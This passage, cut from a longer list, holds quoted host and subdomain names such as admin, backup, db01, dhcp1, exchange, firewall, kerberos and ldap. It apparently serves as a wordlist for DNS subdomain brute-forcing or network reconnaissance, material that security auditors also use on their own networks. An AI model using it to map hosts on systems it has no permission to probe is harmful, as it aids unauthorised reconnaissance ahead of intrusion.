"21cust19", "21cust2", "21cust20", "21cust21", "21cust22", "21cust23", "21cust24", "21cust25", "21cust26", "21cust27", "21cust28", "21cust29", "21cust3", "21cust30", "21cust31", "21cust32", "21cust33", "21cust34", "21cust35", "21cust36", "21cust37", "21cust38", "21cust39", "21cust4", "21cust40", "21cust41", "21cust42", "21cust43", "21cust44", "21cust45", "21cust46", "21cust47", "21cust48", "21cust49", "21cust5", "21cust50", "21cust51", "21cust52", "21cust53", "21cust54", "21cust55", "21cust56", "21cust57", "21cust58", "21cust59", "21cust6", "21cust60", "21cust61", "21cust62", "21cust63", "21cust64", "21cust65", "21cust66", "21cust67", "21cust68", "21cust69", "21cust7", "21cust70", "21cust71", "21cust72", "21cust73", "21cust74", "21cust75", "21cust76", "21cust77", "21cust78", "21cust79", "21cust8", "21cust80", "21cust81", "21cust82", "21cust83", "21cust84", "21cust85", "21cust86", "21cust87", "21cust88", "21cust89", "21cust9", "21cust90", "21cust91", "21cust92", "21cust93", "21cust94", "21cust95", "21cust96", "21cust97", "21cust98", "21cust99", "22", "22cust1", "22cust10", "22cust11", "22cust12", "22cust13", "22cust14", "22cust15", "22cust16", "22cust17", "22cust18", "22cust19", "22cust2", "22cust20", "22cust21", "22cust22", "22cust23", "22cust24", "22cust25", "22cust26", "22cust27", "22cust28", "22cust29", "22cust3", "22cust30", "22cust31", "22cust32", "22cust33", "22cust34", "22cust35", "22cust36", "22cust37", "22cust38", "22cust39", "22cust4", "22cust40", "22cust41", "22cust42", "22cust43", "22cust44", "22cust45", "22cust46", "22cust47", "22cust48", "22cust49", "22cust5", "22cust50", "22cust51", "22cust52", "22cust53", "22cust54", "22cust55", "22cust56", "22cust57", "22cust58", "22cust59", "22cust6", "22cust60", "22cust61", "22cust62", "22cust63", "22cust64", "22cust65", "22cust66", "22cust67", "22cust68", "22cust69", "22cust7", "22cust70", "22cust71", "22cust72", "22cust73", "22cust74", "22cust75", "22cust76", "22cust77", "22cust78", "22cust79", "22cust8", "22cust80", "22cust81", "22cust82", "22cust83", "22cust84", "22cust85", "22cust86", "22cust87", "22cust88", "22cust89", "22cust9", "22cust90", "22cust91", "22cust92", "22cust93", "22cust94", "22cust95", "22cust96", "22cust97", "22cust98", "22cust99", "23", "24", "25", "26", "2607", "27", "28", "29", "2a", "2b", "2c", "2cust1", "2cust10", "2cust11", "2cust12", "2cust13", "2cust14", "2cust15", "2cust16", "2cust17", "2cust18", "2cust19", "2cust2", "2cust20", "2cust21", "2cust22", "2cust23", "2cust24", "2cust25", "2cust26", "2cust27", "2cust28", "2cust29", "2cust3", "2cust30", "2cust31", "2cust32", "2cust33", "2cust34", "2cust35", "2cust36", "2cust37", "2cust38", "2cust39", "2cust4", "2cust40", "2cust41", "2cust42", "2cust43", "2cust44", "2cust45", "2cust46", "2cust47", "2cust48", "2cust49", "2cust5", "2cust50", "2cust51", "2cust52", "2cust53", "2cust54", "2cust55", "2cust56", "2cust57", "2cust58", "2cust59", "2cust6", "2cust60", "2cust61", "2cust62", "2cust63", "2cust64", "2cust65", "2cust66", "2cust67", "2cust68", "2cust69", "2cust7", "2cust70", "2cust71", "2cust72", "2cust73", "2cust74", "2cust75", "2cust76", "2cust77", "2cust78", "2cust79", "2cust8", "2cust80", "2cust81", "2cust82", "2cust83", "2cust84", "2cust85", "2cust86", "2cust87", "2cust88", "2cust89", "2cust9", "2cust90", "2cust91", "2cust92", "2cust93", "2cust94", "2cust95", "2cust96", "2cust97", "2cust98", "2cust99", "2d", "2e", "2f", "3", "30", "31", "31337", "32", "32983d48de4470", "33", "34", "35", "36", "37", "38", "39", "3a", "3b", "3c", "3com", "3cust1", "3cust10", "3cust11", "3cust12", "3cust13", "3cust14", "3cust15", "3cust16", "3cust17", "3cust18", "3cust19", "3cust2", "3cust20", "3cust21", "3cust22", "3cust23", "3cust24", "3cust25", "3cust26", "3cust27", "3cust28", "3cust29", "3cust3", "3cust30", "3cust31", "3cust32", "3cust33", "3cust34", "3cust35", "3cust36", "3cust37", "3cust38", "3cust39", "3cust4", "3cust40", "3cust41", "3cust42", "3cust43", "3cust44", "3cust45", "3cust46", "3cust47", "3cust48", "3cust49", "3cust5", "3cust50", "3cust51", "3cust52", "3cust53", "3cust54", "3cust55", "3cust56", "3cust57", "3cust58", "3cust59", "3cust6", "3cust60", "3cust61", "3cust62", "3cust63", "3cust64", "3cust65", "3cust66", "3cust67", "3cust68", "3cust69", "3cust7", "3cust70", "3cust71", "3cust72", "3cust73", "3cust74", "3cust75", "3cust76", "3cust77", "3cust78", "3cust79", "3cust8", "3cust80", "3cust81", "3cust82", "3cust83", "3cust84", "3cust85", "3cust86", "3cust87", "3cust88", "3cust89", "3cust9", "3cust90", "3cust91", "3cust92", "3cust93", "3cust94", "3cust95", "3cust96", "3cust97", "3cust98", "3cust99", "3d", "3e", "3f", "4", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "4a", "4b", "4c", "4cust1", "4cust10", "4cust11", "4cust12", "4cust13", "4cust14", "4cust15", "4cust16", "4cust17", "4cust18", "4cust19", "4cust2", "4cust20", "4cust21", "4cust22", "4cust23", "4cust24", "4cust25", "4cust26", "4cust27", "4cust28", "4cust29", "4cust3", "4cust30", "4cust31", "4cust32", "4cust33", "4cust34", "4cust35", "4cust36", "4cust37", "4cust38", "4cust39", "4cust4", "4cust40", "4cust41", "4cust42", "4cust43", "4cust44", "4cust45", "4cust46", "4cust47", "4cust48", "4cust49", "4cust5", "4cust50", "4cust51", "4cust52", "4cust53", "4cust54", "4cust55", "4cust56", "4cust57", "4cust58", "4cust59", "4cust6", "4cust60", "4cust61", "4cust62", "4cust7", "4cust8", "4cust9", "4d", "4e", "4f", "5", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5a", "5b", "5c", "5d", "5e", "5f", "6", "60", "61", "62", "63", "64", "65", "66", "67", "68", "69", "6a", "6b", "6b1", "6c", "6d", "6e", "6f", "6net", "6test", "6to4", "7", "70", "71", "72", "73", "74", "75", "76", "77", "78", "79", "7a", "7b", "7c", "7d", "7e", "7f", "8", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "8a", "8b", "8c", "8d", "8e", "8f", "9", "90", "91", "92", "93", "94", "95", "96", "97", "98", "99", "9a", "9b", "9c", "9d", "9e", "9f", "ILMI", "a", "a.auth-ns", "a0", "a01", "a02", "a1", "a10", "a11", "a12", "a13", "a14", "a15", "a16", "a2", "a20", "a21", "a3", "a4", "a5", "a6", "a7", "a8", "a9", "aa", "aaa", "aaaa", "ab", "abc", "about", "ac", "academ", "academico", "acc", "accelerator", "acceso", "access", "account", "accounting", "accounts", "ace", "achilles", "acid", "acs", "activestat", "ad", "ada", "adam", "adkit", "adm", "admin", "admin1", "admin2", "administracion", "administrador", "administrator", "administrators", "admins", "adns1", "ads", "adserver", "adsl", "ae", "ae-0", "ae-1", "ae-2", "ae0", "ae1", "af", "affiliate", "affiliates", "afiliados", "afs3-bos", "afs3-callback", "afs3-errors", "afs3-fileserver", "afs3-kaserver", "afs3-prserver", "afs3-rmtsys", "afs3-update", "afs3-vlserver", "afs3-volser", "ag", "agenda", "agent", "ah", "ai", "air", "aix", "aj", "ajax", "ak", "akamai", "al", "alabama", "alaska", "albuquerque", "alerts", "alex", "alfa", "alice", "allen", "alpha", "altair", "alterwind", "alumni", "am", "amanda", "amandaidx", "amarillo", "amber", "americas", "amon", "ams-core-1", "an", "anaheim", "analyzer", "andromeda", "angel", "anna", "announce", "announcements", "anonsvn", "anonymous", "antares", "antispam", "antivirus", "anubis", "ao", "ap", "ap1", "apache", "apache2-adamant", "apache2-argon", "apache2-blow", "apache2-bongo", "apache2-cabo", "apache2-cid", "apache2-daisy", "apache2-dap", "apache2-echo", "apache2-emu", "apache2-fritz", "apache2-fungi", "apache2-goo", "apache2-grog", "apache2-heavy", "apache2-hok", "apache2-ichiban", "apache2-igloo", "apache2-jiffy", "apache2-jolly", "apache2-kant", "apache2-kip", "apache2-linus", "apache2-lip", "apache2-moon", "apache2-mop", "apache2-nads", "apache2-noxim", "apache2-ogle", "apache2-olive", "apache2-pat", "apache2-prance", "apache2-quack", "apache2-quell", "apache2-rank", "apache2-sith", "apache2-twiddle", "apache2-udder", "apache2-vat", "apache2-whippit", "apache2-xenon", "apache2-yak", "apache2-zoo", "apc", "aphrodite", "api", "api1", "apollo", "app", "app01", "app1", "app2", "apple", "application", "applications", "apply", "apps", "appserver", "aq", "aqua", "aquarius", "ar", "ar01", "ar02", "ar2", "arachne", "aragorn", "archie", "archive", "archivos", "arcnet6", "arcsight", "ares", "argentina", "argon", "argos", "argus", "ari", "ariel", "aries", "arizona", "arkansas", "arlington", "art", "artemis", "arthur", "arwen", "as", "as-0", "as-2", "as0", "as01", "as1", "as2", "as400", "as54", "asa", "ash", "asia", "asp", "asr01", "asterisk", "asterix", "at", "athena", "atlanta", "atlantis", "atlas", "atm", "atom", "att", "atw", "atw6", "au", "auction", "aula", "aulas", "aurora", "austin", "auth", "auth-ns", "auth0", "auth00", "auth01", "auth02", "auth03", "auth1", "auth2", "auto", "autodiscover", "autorun", "av", "avalon", "avmail", "aw", "ax", "ay", "ayuda", "az", "b", "b.auth-ns", "b0", "b01", "b02", "b1", "b10", "b2", "b2b", "b2c", "b3", "b4", "b5", "b6", "b7", "b8", "b9", "ba", "bach", "back", "backbone", "backend", "backup", "backup01", "backup1", "backup2", "backups", "baker", "bakersfield", "balance", "balancer", "baltimore", "banana", "banking", "barney", "barracuda", "bart", "base", "batman", "bayarea", "bb", "bb1", "bbdd", "bbs", "bbs6", "bc", "bcast", "bce1", "bd", "bdc", "be", "bea", "bear", "beast", "bell", "belwue-gw", "bender", "berlin", "bes", "beta", "bf", "bg", "bgp", "bgpd", "bh", "bi", "biblioteca", "biff", "big", "bilbo", "bill", "billing", "bip1-gw", "biz", "biztalk", "bj", "bk", "bl", "black", "blackberry", "blackboard", "blackhole", "blacksun", "blade", "blazing", "blog", "blog6", "blogs", "blue", "bm", "bm0", "bm1", "bm2", "bm3", "bm4", "bn", "bnc", "bo", "bob", "bof", "boise", "bolsa", "bootpc", "bootps", "border", "border1", "border2", "boss", "boston", "bot", "boulder", "box", "boy", "bp", "bpcd", "bpdbm", "bprd", "bq", "br", "br0", "br1", "br2", "br3", "brain", "bravo", "brazil", "bridge", "britian", "broadband", "broadcast", "broadcast-via-ctc", "broker", "bronze", "brown", "bs", "bsd", "bsd0", "bsd01", "bsd02", "bsd1", "bsd2", "bt", "bt6", "bu", "bug", "buggalo", "bugs", "bugzilla", "build", "bulletins", "burn", "burner", "buscador", "business", "buy", "bv", "bw", "bwm", "bx", "by", "bz", "c", "c.auth-ns", "c0", "c1", "c2", "c3", "c4", "c5", "c6", "c7", "c8", "c9", "ca", "cache", "cache1", "cache2", "cacti", "cafe", "cag", "calendar", "california", "call", "callisto", "calvin", "calypso", "cam", "cam1", "camera", "campus", "canada", "canal", "canna", "canon", "carbon", "career", "careers", "carro", "cart", "cartman", "cas", "casper", "casse", "castor", "cat", "catalog", "catalogo", "catalogue", "cb", "cc", "ccxvii", "cd", "cd1", "cdburner", "cdma", "cdn", "ce", "ce0", "ce1", "ce2", "centos", "central", "cerberus", "ceres", "cert", "certificates", "certify", "certserv", "certsrv", "cf", "cfengine", "cfinger", "cg", "cgi", "cgw", "ch", "channel", "channels", "chaos", "chargen", "charlie", "charlotte", "charon", "chat", "chats", "chatserver", "check", "checkpoint", "cheetah", "cherry", "chi", "chicago", "chimera", "chris", "chronos", "ci", "ci53", "ci96", "cims", "cincinnati", "cisco", "cisco1", "cisco2", "citrix", "cj", "ck", "cl", "class", "classes", "classifieds", "classroom", "clearcase", "cleveland", "click1", "clicktrack", "client", "client1", "client2", "client3", "client4", "client5", "clientes", "clientrouter", "clients", "cll", "cloud", "club", "clubs", "cluster", "clusters", "clyde", "cm", "cm0", "cm1", "cm10", "cm11", "cm12", "cm13", "cm14", "cm15", "cm16", "cm17", "cm18", "cm19", "cm2", "cm20", "cm21", "cm22", "cm23", "cm24", "cm25", "cm26", "cm27", "cm28", "cm29", "cm3", "cm30", "cm31", "cm32", "cm33", "cm34", "cm35", "cm36", "cm37", "cm38", "cm39", "cm4", "cm40", "cm41", "cm42", "cm43", "cm44", "cm45", "cm46", "cm47", "cm48", "cm49", "cm5", "cm50", "cm51", "cm52", "cm53", "cm54", "cm55", "cm56", "cm57", "cm58", "cm59", "cm6", "cm60", "cm61", "cm62", "cm63", "cm64", "cm65", "cm66", "cm67", "cm68", "cm69", "cm7", "cm70", "cm71", "cm72", "cm73", "cm74", "cm75", "cm76", "cm77", "cm78", "cm79", "cm8", "cm80", "cm81", "cm82", "cm83", "cm84", "cm85", "cm86", "cm87", "cm88", "cm89", "cm9", "cm90", "cm91", "cm92", "cm93", "cm94", "cm95", "cm96", "cm97", "cm98", "cm99", "cmail", "cmip-agent", "cmip-man", "cms", "cn", "cns1", "cns2", "co", "cobalt", "cobra", "cocoa", "codasrv", "codasrv-se", "code", "coldfusion", "colo", "colo0-gw", "colombus", "colorado", "columbus", "com", "comment", "commerce", "commerceserver", "communigate", "community", "compaq", "compras", "con", "concentrator", "condor", "conf", "conference", "conferencing", "confidential", "connect", "connecticut", "consola", "console", "constellation", "consult", "consultant", "consultants", "consulting", "consumer", "contact", "content", "contracts", "control", "controller", "cook", "copper", "core", "core0", "core01", "core1", "core2", "corona", "corp", "corpmail", "corporate", "correio", "correo", "correoweb", "cortafuegos", "counterstrike", "courier", "courses", "cp", "cpanel", "cpe", "cph-cr1", "cpr1", "cq", "cr", "cr0", "cr1", "cr2", "cr3", "cricket", "crm", "crs", "crystal", "cs", "cs0", "cs1", "cs2", "csg", "csnet-ns", "cso", "css", "ct", "cu", "cube", "curie", "cust", "cust1", "cust10", "cust100", "cust101", "cust102", "cust103", "cust104", "cust105", "cust106", "cust107", "cust108", "cust109", "cust11", "cust110", "cust111", "cust112", "cust113", "cust114", "cust115", "cust116", "cust117", "cust118", "cust119", "cust12", "cust120", "cust121", "cust122", "cust123", "cust124", "cust125", "cust126", "cust13", "cust14", "cust15", "cust16", "cust17", "cust18", "cust19", "cust2", "cust20", "cust21", "cust22", "cust23", "cust24", "cust25", "cust26", "cust27", "cust28", "cust29", "cust3", "cust30", "cust31", "cust32", "cust33", "cust34", "cust35", "cust36", "cust37", "cust38", "cust39", "cust4", "cust40", "cust41", "cust42", "cust43", "cust44", "cust45", "cust46", "cust47", "cust48", "cust49", "cust5", "cust50", "cust51", "cust52", "cust53", "cust54", "cust55", "cust56", "cust57", "cust58", "cust59", "cust6", "cust60", "cust61", "cust62", "cust63", "cust64", "cust65", "cust66", "cust67", "cust68", "cust69", "cust7", "cust70", "cust71", "cust72", "cust73", "cust74", "cust75", "cust76", "cust77", "cust78", "cust79", "cust8", "cust80", "cust81", "cust82", "cust83", "cust84", "cust85", "cust86", "cust87", "cust88", "cust89", "cust9", "cust90", "cust91", "cust92", "cust93", "cust94", "cust95", "cust96", "cust97", "cust98", "cust99", "customer", "customers", "customs", "cv", "cvs", "cvspserver", "cw", "cx", "cy", "cyborgs", "cyclops", "cygnus", "cz", "d", "d0", "d1", "d1-0", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d68", "d69", "d7", "d70", "d71", "d72", "d73", "d74", "d75", "d76", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "daap", "daisy", "dallas", "darwin", "dashboard", "data", "database", "database01", "database02", "database1", "database2", "databases", "datametrics", "datastore", "datatracker", "datos", "david", "davinci", "daytime", "db", "db0", "db01", "db02", "db03", "db1", "db2", "db3", "dbs", "dc", "dc1", "dc2", "dd", "dds", "de", "de-cix", "dealers", "debian", "dec", "decix", "dedicated", "def", "default", "defiant", "deimos", "delaware", "dell", "delta", "delta1", "demeter", "demo", "demo2", "demon", "demon-gw", "demonstration", "demos", "demostration", "deneb", "denver", "depot", "des", "desarrollo", "descargas", "design", "designer", "desktop", "destiny", "detroit", "deutschland", "dev", "dev0", "dev01", "dev1", "dev2", "deve", "devel", "develop", "developer", "developers", "development", "device", "devserver", "devsql", "df", "dg", "dh", "dhcp", "dhcp-pool", "dhcp01", "dhcp02", "dhcp1", "dhcp10", "dhcp11", "dhcp12", "dhcp13", "dhcp14", "dhcp15", "dhcp16", "dhcp17", "dhcp18", "dhcp19", "dhcp2", "dhcp20", "dhcp21", "dhcp22", "dhcp23", "dhcp24", "dhcp25", "dhcp26", "dhcp27", "dhcp28", "dhcp29", "dhcp3", "dhcp4", "dhcp5", "dhcp6", "dhcp7", "dhcp8", "dhcp9", "di", "di1", "dial", "dialin", "dialup", "diamond", "diana", "diary", "dict", "digital", "dilbert", "dino", "dione", "dir", "dirac", "dircproxy", "direct", "directory", "disc", "discard", "disco", "discovery", "discuss", "discussion", "discussions", "disk", "disney", "dist", "dist02", "distcc", "distmp3", "distributer", "distributers", "dj", "dk", "dl", "dlv", "dm", "dmail", "dms", "dmz", "dmz-gw", "dn", "dnews", "dns", "dns-2", "dns-a", "dns-b", "dns-cache1", "dns-cache2", "dns0", "dns00", "dns01", "dns02", "dns03", "dns1", "dns2", "dns3", "dns4", "dns6", "dnsa", "dnsb", "dnscache1", "dnscache2", "do", "doc", "docs", "documentacion", "documentos", "dolphin", "domain", "domain-controller", "domaincontroller", "domains", "dominio", "domino", "dominoweb", "donald", "doom", "download", "downloads", "downtown", "dp", "dq", "dr", "draal", "drac", "draco", "dragon", "drupal", "ds", "ds1", "dsl", "dt", "du", "dv", "dw", "dx", "dy", "dyn", "dynamic", "dynip", "dz", "e", "e-com", "e-commerce", "e0", "e0-0", "e1", "e2", "e22", "e24", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eaccess", "eagle", "earth", "east", "eb", "ec", "echo", "eclipse", "ecom", "ecommerce", "ed", "edge", "edge1", "edge2", "edi", "edu", "education", "edward", "ee", "ef", "efnet", "eg", "eh", "ei", "einstein", "ej", "ejemplo", "ejemplos", "ek", "eklogin", "el", "elearning", "elpaso", "em", "email", "email1", "email2", "emerald", "employees", "empresa", "empresas", "ems", "en", "en01", "enable", "enbd-cstatd", "enbd-sstatd", "enc", "eng", "eng01", "eng1", "engine", "engineer", "engineering", "enigma", "enrutador", "enterprise", "enum", "eo", "eos", "ep", "epp", "eprints", "epsilon", "epzilon", "eq", "er", "eris", "eros", "erp", "es", "esd", "eservice", "esm", "espanol", "estadisticas", "esx", "esx1", "et", "eta", "eth0", "eth1", "eth2", "ethernet", "eu", "euler", "eunet-gw", "eunomia", "europa", "europe", "ev", "eva", "eve", "eventos", "events", "everest", "ew", "ex", "ex1", "example", "examples", "excalibur", "exch", "exchange", "exchange1", "exchange2", "exec", "exeter", "exit", "exmail", "ext", "extern", "external", "extra", "extranet", "ey", "ez", "ezproxy", "f", "f0", "f0-0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa-0-0", "fa0", "fa0-0", "fa0-1", "falcon", "faraday", "farm", "fastethernet0-0", "faststats", "fatserv", "fax", "fb", "fc", "fd", "fe", "fe0", "fe0-0", "fe0-1", "fe1", "fe1-0", "fe2", "fe2-0", "feedback", "feeds", "felix", "fermi", "ff", "fg", "fh", "fi", "fiberlink", "fido", "field", "file", "files", "filesender", "fileserv", "fileserver", "filestore", "filter", "finance", "find", "finger", "fire", "firewall", "fix", "fixes", "fj", "fk", "fl", "flash", "florida", "flow", "fm", "fn", "fo", "folders", "font-service", "foobar", "formacion", "forms", "foro", "foros", "fortworth", "forum", "forums", "foto", "fotos", "foundry", "fourier", "fox", "foxtrot", "fp", "fq", "fr", "france", "frank", "franklin", "fred", "free", "freebsd", "freebsd0", "freebsd01", "freebsd02", "freebsd1", "freebsd2", "freedommail", "freemail", "freeware", "fresno", "frodo", "front", "frontdesk", "frox", "fry", "fs", "fs1", "fs2", "fsp", "ft", "ftb", "ftp", "ftp-", "ftp-data", "ftp0", "ftp1", "ftp2", "ftp3", "ftp6", "ftpd", "ftps", "ftps-data", "ftpserver", "fu", "fuji", "fun", "fv", "fw", "fw-1", "fw0", "fw00", "fw01", "fw02", "fw03", "fw1", "fw1-gw", "fw2", "fw3", "fwsm", "fwsm0", "fwsm01", "fwsm1", "fx", "fy", "fz", "g", "g0-26", "g1", "ga", "gaia", "galatea", "galaxy", "galeria", "galerias", "galerie", "galileo", "galleries", "gallery", "game", "games", "gameserver", "gamma", "gandalf", "ganymede", "garfield", "gate", "gate1", "gate2", "gatekeeper", "gateway", "gateway1", "gateway2", "gauss", "gb", "gc", "gd", "gdomap", "gds_db", "ge", "ge-0", "ge-0-0-0-0", "ge0", "ge0-0", "ge0-1", "ge0-2", "ge1", "ge1-0", "ge11", "ge13", "ge2-0", "geb", "gemini", "general", "genesis", "gentoo", "geo", "george", "georgia", "ger", "germany", "get", "gf", "gg", "ggz", "gh", "ghost", "gi", "gi-0-1", "gi0-0", "gi0-1", "gi0-2", "gi2-0", "gig0-1", "gig0-2", "gig0-3", "gigabitethernet0", "gigabitethernet1", "gige-g0-1", "gige-gbge0", "gilford", "gimli", "gis", "git", "gizmo", "gj", "gk", "gl", "glendale", "global", "gm", "gmail", "gn", "gnu", "gnutella-rtr", "gnutella-svc", "go", "gold", "goldmine", "golf", "gollum", "gonzo", "goofy", "gopher", "gp", "gps", "gpsd", "gq", "gr", "green", "group", "groups", "groupwise", "gs", "gsx", "gt", "gu", "guardian", "guest", "guia", "guide", "gv", "gw", "gw-ipv6", "gw0", "gw01", "gw02", "gw1", "gw2", "gw3", "gw4", "gw6", "gx", "gy", "gz", "h", "h0", "h1", "h10", "h11", "h12", "h13", "h14", "h15", "h16", "h17", "h18", "h19", "h2", "h20", "h21", "h22", "h23", "h24", "h25", "h26", "h27", "h28", "h29", "h3", "h30", "h31", "h32", "h33", "h34", "h35", "h36", "h37", "h38", "h39", "h4", "h40", "h41", "h42", "h43", "h44", "h45", "h46", "h47", "h48", "h49", "h5", "h50", "h51", "h52", "h53", "h54", "h55", "h56", "h57", "h58", "h59", "h6", "h60", "h61", "h62", "h63", "h64", "h65", "h66", "h67", "h68", "h69", "h7", "h70", "h71", "h72", "h73", "h74", "h75", "h76", "h77", "h78", "h79", "h8", "h80", "h81", "h82", "h83", "h84", "h85", "h86", "h87", "h88", "h89", "h9", "h90", "h91", "h92", "h93", "h94", "h95", "h96", "h97", "h98", "h99", "ha", "ha1", "ha2", "hades", "hal", "halflife", "hammer", "happy", "haproxy", "has", "hat", "hawaii", "hawk", "hb", "hc", "hd", "he", "helene", "helios", "helium", "helix", "hello", "help", "helpdesk", "helponline", "henry", "hera", "heracles", "hercules", "hermes", "hestia", "hf", "hg", "hh", "hi", "hidden", "hj", "hk", "hkp", "hl", "hm", "hmmp-ind", "hn", "ho", "hobbes", "hobby-gw", "hollywood", "home", "homebase", "homepage", "homer", "honeypot", "honolulu", "hop", "horus", "host", "host-1", "host-10", "host-11", "host-12", "host-13", "host-14", "host-15", "host-16", "host-17", "host-18", "host-19", "host-2", "host-20", "host-21", "host-22", "host-23", "host-24", "host-25", "host-26", "host-27", "host-28", "host-29", "host-3", "host-30", "host-31", "host-32", "host-33", "host-34", "host-35", "host-36", "host-37", "host-38", "host-39", "host-4", "host-40", "host-41", "host-42", "host-43", "host-44", "host-45", "host-46", "host-47", "host-48", "host-49", "host-5", "host-50", "host-51", "host-52", "host-53", "host-54", "host-55", "host-56", "host-57", "host-58", "host-59", "host-6", "host-60", "host-61", "host-62", "host-63", "host-64", "host-65", "host-66", "host-67", "host-68", "host-69", "host-7", "host-70", "host-71", "host-72", "host-73", "host-74", "host-75", "host-76", "host-77", "host-78", "host-79", "host-8", "host-80", "host-81", "host-82", "host-83", "host-84", "host-85", "host-86", "host-87", "host-88", "host-89", "host-9", "host-90", "host-91", "host-92", "host-93", "host-94", "host-95", "host-96", "host-97", "host-98", "host-99", "host0", "host01", "host02", "host03", "host04", "host05", "host06", "host07", "host08", "host09", "host1", "host10", "host11", "host12", "host13", "host14", "host15", "host16", "host17", "host18", "host19", "host2", "host20", "host21", "host22", "host23", "host24", "host25", "host26", "host27", "host28", "host29", "host3", "host30", "host31", "host32", "host33", "host34", "host35", "host36", "host37", "host38", "host39", "host4", "host40", "host41", "host42", "host43", "host44", "host45", "host46", "host47", "host48", "host49", "host5", "host50", "host51", "host52", "host53", "host54", "host55", "host56", "host57", "host58", "host59", "host6", "host60", "host61", "host62", "host63", "host64", "host65", "host66", "host67", "host68", "host69", "host7", "host70", "host71", "host72", "host73", "host74", "host75", "host76", "host77", "host78", "host79", "host8", "host80", "host81", "host82", "host83", "host84", "host85", "host86", "host87", "host88", "host89", "host9", "host90", "host91", "host92", "host93", "host94", "host95", "host96", "host97", "host98", "host99", "hosted", "hosted-by", "hosting", "hosting1", "hosting2", "hostmon", "hostnames", "hotel", "hotjobs", "hotspot", "houstin", "houston", "howto", "hp", "hpov", "hq", "hr", "hs", "hsrp", "ht", "http", "https", "hu", "hub", "humanresources", "hund", "hv", "hw", "hwmaint", "hx", "hy", "hydra", "hydrogen", "hylafax", "hyperion", "hypernova", "hz", "i", "ia", "iana", "ias", "iax", "ib", "ibm", "ibmdb", "ic", "icarus", "ice", "icecube", "icons", "icpv2", "ict", "id", "ida", "idaho", "idefix", "idp", "ids", "ie", "if", "if-0-0-0", "if-10-0-0", "if-2-0-0", "ifolder", "ig", "ih", "ii", "iis", "ij", "ik", "il", "illinois", "illusion", "ilo", "im", "image", "images", "imail", "imap", "imap3d", "imap4", "imapd", "imaps", "img", "img0", "img01", "img02", "imgs", "imogen", "ims", "imsp", "in", "in1", "inbound", "inc", "include", "incoming", "india", "indiana", "indianapolis", "indigo", "inet", "inferno", "info", "info1", "info2", "informix", "ingreslock", "inmuebles", "ins2", "inside", "install", "int", "intern", "internal", "international", "internet", "internet2", "interno", "intl", "intra", "intranet", "invalid", "inventory", "investor", "investors", "io", "iota", "iowa", "ip", "ip00", "ip01", "ip02", "ip03", "ip04", "ip05", "ip06", "ip07", "ip1", "ip10", "ip11", "ip12", "ip13", "ip14", "ip15", "ip16", "ip17", "ip18", "ip19", "ip2", "ip20", "ip21", "ip22", "ip23", "ip24", "ip25", "ip26", "ip27", "ip28", "ip29", "ip3", "ip30", "ip31", "ip32", "ip33", "ip34", "ip35", "ip36", "ip37", "ip38", "ip39", "ip4", "ip40", "ip41", "ip42", "ip43", "ip44", "ip45", "ip46", "ip47", "ip48", "ip49", "ip5", "ip50", "ip51", "ip52", "ip53", "ip54", "ip55", "ip56", "ip57", "ip58", "ip59", "ip6", "ip60", "ip61", "ip62", "ip63", "ip64", "ip65", "ip66", "ip67", "ip68", "ip69", "ip6test", "ip7", "ip70", "ip71", "ip72", "ip73", "ip74", "ip75", "ip76", "ip77", "ip78", "ip79", "ip8", "ip80", "ip81", "ip82", "ip83", "ip84", "ip85", "ip86", "ip87", "ip88", "ip89", "ip9", "ip90", "ip91", "ip92", "ip93", "ip94", "ip95", "ip96", "ip97", "ip98", "ip99", "ipad", "iphone", "iplanet", "ipmi", "ipmonitor", "ipod", "ipp", "iprop", "ipsec", "ipsec-gw", "iptv", "ipv4", "ipv6", "ipv6-gw", "ipv6-router", "ipv6.teredo", "ipv6cam", "ipv6forum", "ipv6gw", "ipv6test", "ipv6tv", "ipx", "iq", "ir", "irc", "irc6", "ircd", "ircs", "ircserver", "ireland", "iris", "iron", "ironport", "irssi", "irvine", "irving", "is", "isa", "isaiah", "isakmp", "isaserv", "isaserver", "isdnlog", "isis", "isisd", "isl-hub-01", "isl-hub-1", "ism", "iso-tsap", "isp", "israel", "issues", "ist", "isync", "it", "italy", "itchy", "its", "iu", "iv", "iw", "ix", "ix-2-2", "iy", "iz", "j", "j1", "j2", "ja", "jabber", "jack", "jade", "jaguar", "james", "janus", "japan", "java", "jb", "jc", "jd", "je", "jedi", "jerry", "jest", "jf", "jg", "jh", "ji", "jira", "jj", "jk", "jl", "jm", "jn", "jo", "jobs", "joe", "john", "jp", "jq", "jr", "jrun", "js", "jt", "ju", "juegos", "juliet", "juliette", "juniper", "juno", "jupiter", "jv", "jw", "jx", "jy", "jz", "k", "k1", "k2", "ka", "kamanda", "kansas", "kansascity", "kappa", "kazaa", "kb", "kc", "kd", "kdc1", "ke", "kentucky", "kepler", "kerberos", "kerberos-adm", "kerberos4", "kerberos_master", "kermit", "kernel", "keynote", "keys", "keyserver", "kf", "kg", "kh", "ki", "kilo", "king", "kirk", "kiwi", "kj", "kk", "kl", "klogin", "km", "kn", "knetd", "knowledgebase", "knoxville", "ko", "koala", "koe", "korea", "kp", "kpasswd", "kpop", "kq", "kr", "krb_prop", "krbupdate", "kronos", "krypton", "ks", "kshell", "kst-core-1", "kt", "ku", "kv", "kvm", "kw", "kx", "ky", "kz", "l", "l0", "l1", "l2f", "la", "lab", "lab1", "lab2", "laboratories", "laboratorio", "laboratory", "labs", "laforge", "lambda", "lan", "lan-gate", "laptop", "larry", "laser", "laserjet", "lasvegas", "launch", "lb", "lb01", "lb1", "lb2", "lc", "ld", "ldap", "ldap1", "ldap2", "ldaps", "le", "learn", "legacy", "legal", "legolas", "leng", "lenny", "leo", "leopard", "lf", "lg", "lh", "li", "lib", "libra", 